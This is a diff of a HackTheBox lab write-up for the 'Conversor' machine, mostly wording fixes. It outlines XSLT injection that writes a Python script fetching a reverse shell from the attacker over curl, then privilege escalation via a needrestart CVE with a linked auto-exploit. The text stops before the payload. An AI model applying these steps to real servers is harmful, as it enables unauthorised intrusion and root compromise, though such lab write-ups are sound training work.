Ouss6116/HackTheBox-Writeup/Conversor/HTB-Conversor-Writeup.md

 ---

-# COnversor (Easy): 10.10.11.92
+# Conversor (Easy): 10.10.11.92

 ![Icon](Images/coversoricon.png)

 ---

-## Quick Overview
+## Quick overview

-a new linux machine, with easy difficulty, that put in front of us :
+A new Linux machine (easy) that presented the following path:

-1. **XSLT Exploitation** → Database Access → **USER.TXT**
+1. **XSLT exploitation** → Database access → **USER.TXT**
-2. **Needrestart 3.7 Privilege Escalation** → [CVE-2024-48990 Auto Exploit](https://github.com/Serner77/CVE-2024-48990-Automatic-Exploit) → *Thanks to @Serner77* → **ROOT.TXT**
+2. **Needrestart 3.7 privilege escalation** → [CVE-2024-48990 automatic exploit](https://github.com/Serner77/CVE-2024-48990-Automatic-Exploit) → *Thanks to @Serner77* → **ROOT.TXT**

 ---

 ## USER.TXT

-### NMAP Enumeration
+### Nmap enumeration

-as with every machine we start with the nmap scan, that show as a classic 22/80 ports.
+As usual, we start with an `nmap` scan, which shows the classic ports 22 and 80.

 ![Icon](Images/nmapscan.png)

-we go to conversor web page, as first sight we see XML converation via XSLT, with a small round with the discover the source code in the About page.
+We opened the Conversor web page and quickly noticed XML conversion via XSLT.
+The **About** page hinted that the source is discoverable.

-in the Source code we got some valuabla informations, the most imprtants are :
+From the source code we found several useful details:

-1. XSLT is exploitable
+1. The XSLT is exploitable.
-2. you can run python scripts in the scripts directory, you can find this info in install.md
+2. Python scripts can be executed from the **scripts** directory (this is mentioned in `install.md`).
-3. the users database is in instance directory
+3. The users database is stored in the **instance** directory.

-### First Step
+### First step

-so first of all we will start with a reverse shell, by writing a python script with the help of xslt file, that will use curl to connect to our machine, that have aleardy a python http server prepared, to copy a reverse shell script, and lunche it to get our initial login.
+We started by obtaining a reverse shell.
+Using the XSLT file we uploaded, we instructed the server to write a Python script to `/var/www/conversor.htb/scripts/shell.py`, which then uses `curl` to fetch a reverse-shell script from our machine.

-so upload this XSLT File:
+Upload the following XSLT file:

 ```XSLT
 <?xml version="1.0" encoding="UTF-8"?>